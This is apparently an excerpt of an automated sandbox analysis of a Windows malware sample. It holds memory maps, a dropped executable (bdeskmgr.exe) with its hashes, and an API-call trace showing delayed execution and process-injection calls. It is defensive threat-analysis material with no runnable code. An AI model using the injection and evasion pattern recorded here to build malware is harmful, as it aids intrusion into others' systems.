| private_0x0000000002000000 | 0x02000000 | 0x0207ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002080000 | 0x02080000 | 0x020bffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002080000 | 0x02080000 | 0x020bdfff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000020c0000 | 0x020c0000 | 0x020fffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000020c0000 | 0x020c0000 | 0x020fdfff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002120000 | 0x02120000 | 0x0215ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002160000 | 0x02160000 | 0x02256fff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000002160000 | 0x02160000 | 0x022effff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002160000 | 0x02160000 | 0x0225ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002160000 | 0x02160000 | 0x0219ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002160000 | 0x02160000 | 0x0219dfff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000021a0000 | 0x021a0000 | 0x0229ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000021a0000 | 0x021a0000 | 0x021dffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000021a0000 | 0x021a0000 | 0x021ddfff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000021e0000 | 0x021e0000 | 0x0221dfff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002220000 | 0x02220000 | 0x0225ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002220000 | 0x02220000 | 0x0225dfff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002260000 | 0x02260000 | 0x0229ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002260000 | 0x02260000 | 0x0229dfff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000022a0000 | 0x022a0000 | 0x022dffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000022a0000 | 0x022a0000 | 0x022ddfff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000022e0000 | 0x022e0000 | 0x022effff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000022f0000 | 0x022f0000 | 0x023effff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000022f0000 | 0x022f0000 | 0x0232ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000022f0000 | 0x022f0000 | 0x0232dfff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002330000 | 0x02330000 | 0x0236dfff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002370000 | 0x02370000 | 0x023affff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002370000 | 0x02370000 | 0x023adfff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000023b0000 | 0x023b0000 | 0x024affff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000023b0000 | 0x023b0000 | 0x023e9fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000023f0000 | 0x023f0000 | 0x024effff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000023f0000 | 0x023f0000 | 0x0242ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002430000 | 0x02430000 | 0x0252ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002430000 | 0x02430000 | 0x025d8fff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000002430000 | 0x02430000 | 0x024b8fff | Pagefile Backed Memory | Readable, Writable, Executable |
|
|
|
- |
| private_0x00000000024b0000 | 0x024b0000 | 0x024effff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000024f0000 | 0x024f0000 | 0x025effff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002530000 | 0x02530000 | 0x0262ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000025f0000 | 0x025f0000 | 0x02b6ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000025f0000 | 0x025f0000 | 0x026effff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002770000 | 0x02770000 | 0x02b6ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000002b70000 | 0x02b70000 | 0x02e2afff | Pagefile Backed Memory | Readable |
|
|
|
- |
| sortdefault.nls | 0x02e30000 | 0x030fefff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x0000000003100000 | 0x03100000 | 0x032a8fff | Private Memory | Readable, Writable |
|
|
|
- |
| oleacc.dll | 0x73f60000 | 0x73f9bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msimg32.dll | 0x741f0000 | 0x741f4fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| winmm.dll | 0x74200000 | 0x74231fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| gdiplus.dll | 0x74240000 | 0x743cffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wtsapi32.dll | 0x743d0000 | 0x743dcfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| comctl32.dll | 0x743e0000 | 0x74463fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| winspool.drv | 0x74470000 | 0x744c0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| uxtheme.dll | 0x74910000 | 0x7498ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wow64cpu.dll | 0x749a0000 | 0x749a7fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wow64win.dll | 0x749b0000 | 0x74a0bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wow64.dll | 0x74a10000 | 0x74a4efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| cryptbase.dll | 0x74c20000 | 0x74c2bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sspicli.dll | 0x74c30000 | 0x74c8ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernel32.dll | 0x74cb0000 | 0x74dbffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rpcrt4.dll | 0x74dc0000 | 0x74eaffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msctf.dll | 0x75000000 | 0x750cbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| advapi32.dll | 0x750d0000 | 0x7516ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shlwapi.dll | 0x75170000 | 0x751c6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ws2_32.dll | 0x751d0000 | 0x75204fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| comdlg32.dll | 0x75210000 | 0x7528afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| user32.dll | 0x75570000 | 0x7566ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| gdi32.dll | 0x75670000 | 0x756fffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| imm32.dll | 0x75750000 | 0x757affff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| usp10.dll | 0x757c0000 | 0x7585cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shell32.dll | 0x758a0000 | 0x764e9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msvcrt.dll | 0x764f0000 | 0x7659bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| lpk.dll | 0x76830000 | 0x76839fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernelbase.dll | 0x76840000 | 0x76885fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| nsi.dll | 0x76890000 | 0x76895fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sechost.dll | 0x768a0000 | 0x768b8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ole32.dll | 0x768c0000 | 0x76a1bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| oleaut32.dll | 0x76a20000 | 0x76aaefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000076cd0000 | 0x76cd0000 | 0x76deefff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000076df0000 | 0x76df0000 | 0x76ee9fff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x76ef0000 | 0x77098fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x770d0000 | 0x7724ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x000000007efb0000 | 0x7efb0000 | 0x7efd2fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000007efd5000 | 0x7efd5000 | 0x7efd7fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efd8000 | 0x7efd8000 | 0x7efdafff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efdb000 | 0x7efdb000 | 0x7efddfff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efde000 | 0x7efde000 | 0x7efdefff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efdf000 | 0x7efdf000 | 0x7efdffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | Readable |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7fffffeffff | Private Memory | Readable |
|
|
|
- |
Created Files
| Filename | File Size | Hash Values | YARA Match | Actions |
|---|---|---|---|---|
| c:\users\aetadzjz\appdata\roaming\microsoft\crypore6\bdeskmgr.exe | 2.73 MB |
MD5:
a6f489d45984338621f3c377d82220ce
SHA1: bbe3a54281addb8a59832ecc093f986381f2a622 SHA256: 3d97696c003caf79376088c61bf21d782248fab1f6e8baac0a918013adc654b2 |
|
|
Threads
Thread 0x3a4
194
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| System | Get Time | type = System Time, time = 2018-03-29 15:43:21 (UTC) |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x74cb0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, address_out = 0x74cc4f2b |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FlsFree, address_out = 0x74cc359f |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FlsGetValue, address_out = 0x74cc1252 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FlsSetValue, address_out = 0x74cc4208 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = InitializeCriticalSectionEx, address_out = 0x74cc4d28 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateEventExW, address_out = 0x74d4410b |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateSemaphoreExW, address_out = 0x74d44195 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetThreadStackGuarantee, address_out = 0x74ccd31f |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateThreadpoolTimer, address_out = 0x74cdee7e |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetThreadpoolTimer, address_out = 0x7711441c |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = WaitForThreadpoolTimerCallbacks, address_out = 0x7713c50e |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, address_out = 0x7713c381 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateThreadpoolWait, address_out = 0x74cdf088 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetThreadpoolWait, address_out = 0x771205d7 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CloseThreadpoolWait, address_out = 0x7713ca24 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FlushProcessWriteBuffers, address_out = 0x770f0b8c |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FreeLibraryWhenCallbackReturns, address_out = 0x771afde8 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcessorNumber, address_out = 0x77141e1d |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetLogicalProcessorInformation, address_out = 0x74d44761 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateSymbolicLinkW, address_out = 0x74d3cd11 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetDefaultDllDirectories, address_out = 0x0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = EnumSystemLocalesEx, address_out = 0x74d4424f |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, address_out = 0x74d446b1 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetDateFormatEx, address_out = 0x74d56676 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetLocaleInfoEx, address_out = 0x74d44751 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetTimeFormatEx, address_out = 0x74d565f1 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetUserDefaultLocaleName, address_out = 0x74d447c1 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = IsValidLocaleName, address_out = 0x74d447e1 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = LCMapStringEx, address_out = 0x74d447f1 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentPackageId, address_out = 0x0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetTickCount64, address_out = 0x74cdeee0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetFileInformationByHandleExW, address_out = 0x0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetFileInformationByHandleW, address_out = 0x0 |
|
1 | |
| File | Open | filename = STD_INPUT_HANDLE |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Open | filename = STD_ERROR_HANDLE |
|
1 | |
| Environment | Get Environment String | - |
|
1 | |
| Module | Get Filename | process_name = c:\users\public\229393.exe, file_name_orig = C:\Users\Public\229393.exe, size = 260 |
|
1 | |
| System | Get Time | type = System Time, time = 2018-03-29 15:43:21 (UTC) |
|
1 | |
| Ini | Read | file_name_orig = Win.ini, section_name = windows, key_name = DragMinDist, default_value = 2, data_out = 2 |
|
1 | |
| Ini | Read | file_name_orig = Win.ini, section_name = windows, key_name = DragDelay, default_value = 200, data_out = 200 |
|
1 | |
| File | Write | size = 1 |
|
1 | |
| System | Get Info | type = System Directory, result_out = C:\Windows\system32 |
|
1 | |
| Environment | Get Environment String | name = Fats |
|
1 | |
| System | Sleep | duration = 23207 milliseconds (23.207 seconds) |
|
1 | |
| Module | Load | module_name = KERNEL32, base_address = 0x74cb0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = VirtualProtect, address_out = 0x74cc435f |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x74cb0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetLastError, address_out = 0x74cc11c0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = HeapCreate, address_out = 0x74cc4a2d |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleA, address_out = 0x74cc1245 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = ExitThread, address_out = 0x7712d598 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = VirtualProtect, address_out = 0x74cc435f |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetProcAddress, address_out = 0x74cc1222 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = HeapAlloc, address_out = 0x770fe026 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = LoadLibraryA, address_out = 0x74cc49d7 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateEventA, address_out = 0x74cc328c |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = HeapFree, address_out = 0x74cc14c9 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = WaitForSingleObject, address_out = 0x74cc1136 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetEvent, address_out = 0x74cc16c5 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleFileNameW, address_out = 0x74cc4950 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = VirtualFree, address_out = 0x74cc186e |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CloseHandle, address_out = 0x74cc1410 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = lstrlenA, address_out = 0x74cc5a4b |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateThread, address_out = 0x74cc34d5 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = VirtualAlloc, address_out = 0x74cc1856 |
|
1 | |
| Module | Load | module_name = ntdll.dll, base_address = 0x770d0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ntdll.dll, function = memcpy, address_out = 0x770f2340 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ntdll.dll, function = memset, address_out = 0x770fdf20 |
|
1 | |
| Module | Get Handle | module_name = c:\users\public\229393.exe, base_address = 0x400000 |
|
1 | |
| Module | Load | module_name = ntdll.dll, base_address = 0x770d0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ntdll.dll, function = ZwQueryInformationToken, address_out = 0x770efb98 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ntdll.dll, function = ZwQueryInformationProcess, address_out = 0x770efac8 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ntdll.dll, function = NtCreateSection, address_out = 0x770eff94 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ntdll.dll, function = NtMapViewOfSection, address_out = 0x770efc40 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ntdll.dll, function = NtUnmapViewOfSection, address_out = 0x770efc70 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ntdll.dll, function = ZwClose, address_out = 0x770ef9d0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ntdll.dll, function = RtlNtStatusToDosError, address_out = 0x771061ed |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ntdll.dll, function = ZwOpenProcessToken, address_out = 0x770f10b0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ntdll.dll, function = NtQuerySystemInformation, address_out = 0x770efda0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ntdll.dll, function = mbstowcs, address_out = 0x7714a152 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ntdll.dll, function = memset, address_out = 0x770fdf20 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ntdll.dll, function = RtlUpcaseUnicodeString, address_out = 0x7712b49f |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ntdll.dll, function = RtlFreeUnicodeString, address_out = 0x770fe126 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ntdll.dll, function = ZwOpenProcess, address_out = 0x770efc10 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ntdll.dll, function = memcpy, address_out = 0x770f2340 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ntdll.dll, function = RtlUnwind, address_out = 0x77116d39 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ntdll.dll, function = NtQueryVirtualMemory, address_out = 0x770efbc8 |
|
1 | |
| Module | Load | module_name = SHLWAPI.dll, base_address = 0x75170000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = PathFindExtensionA, address_out = 0x7519eced |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = PathCombineW, address_out = 0x7518c39c |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = PathFindExtensionW, address_out = 0x7518a1b9 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = StrChrA, address_out = 0x7517c5e6 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = StrRChrA, address_out = 0x7517ccf5 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = PathFindFileNameW, address_out = 0x7518bb71 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = StrStrIW, address_out = 0x751846e9 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x74cb0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateWaitableTimerA, address_out = 0x74d44c24 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateProcessA, address_out = 0x74cc1072 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = HeapAlloc, address_out = 0x770fe026 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateFileMappingW, address_out = 0x74cc1909 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetWaitableTimer, address_out = 0x74cebb2f |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateFileW, address_out = 0x74cc3f5c |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = MoveFileExW, address_out = 0x74cd9b2d |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetFileSize, address_out = 0x74cc196e |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = HeapFree, address_out = 0x74cc14c9 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = lstrlenW, address_out = 0x74cc1700 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = Sleep, address_out = 0x74cc10ff |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = lstrcmpiW, address_out = 0x74cdd5cd |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleA, address_out = 0x74cc1245 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetEvent, address_out = 0x74cc16c5 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetLastError, address_out = 0x74cc11c0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = lstrcatW, address_out = 0x74ce828e |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateEventA, address_out = 0x74cc328c |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetProcAddress, address_out = 0x74cc1222 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = DeleteFileW, address_out = 0x74cc89b3 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = MapViewOfFile, address_out = 0x74cc18f1 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = LoadLibraryA, address_out = 0x74cc49d7 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = ResetEvent, address_out = 0x74cc16dd |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SleepEx, address_out = 0x74cc1215 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = InterlockedDecrement, address_out = 0x74cc13f0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = HeapCreate, address_out = 0x74cc4a2d |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = InterlockedIncrement, address_out = 0x74cc1400 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = HeapDestroy, address_out = 0x74cc35b7 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateThread, address_out = 0x74cc34d5 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CloseHandle, address_out = 0x74cc1410 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetSystemTimeAsFileTime, address_out = 0x74cc3509 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = WaitForSingleObject, address_out = 0x74cc1136 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = ExitProcess, address_out = 0x74cc7a10 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetTempPathA, address_out = 0x74ce276c |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentThreadId, address_out = 0x74cc1450 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetTempFileNameA, address_out = 0x74ce9d3f |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetFileTime, address_out = 0x74cc4407 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FindNextFileA, address_out = 0x74ced53e |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CompareFileTime, address_out = 0x74cc1b25 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FindClose, address_out = 0x74cc4442 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FindFirstFileA, address_out = 0x74cce2ce |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = ExpandEnvironmentStringsA, address_out = 0x74cdeb39 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateFileA, address_out = 0x74cc53c6 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = OpenProcess, address_out = 0x74cc1986 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SuspendThread, address_out = 0x74ce7d7e |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = ResumeThread, address_out = 0x74cc43ef |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = VirtualProtectEx, address_out = 0x74d445bf |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = lstrcmpiA, address_out = 0x74cc3e8e |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = lstrcpyA, address_out = 0x74ce2a9d |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = lstrcmpA, address_out = 0x74cdeceb |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = lstrlenA, address_out = 0x74cc5a4b |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetVersion, address_out = 0x74cc4467 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcessId, address_out = 0x74cc11f8 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetLongPathNameW, address_out = 0x74cca315 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetEndOfFile, address_out = 0x74cdce2e |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = lstrcpyW, address_out = 0x74ce3102 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = lstrcatA, address_out = 0x74ce2b7a |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateDirectoryW, address_out = 0x74cc4259 |
|
1 | |
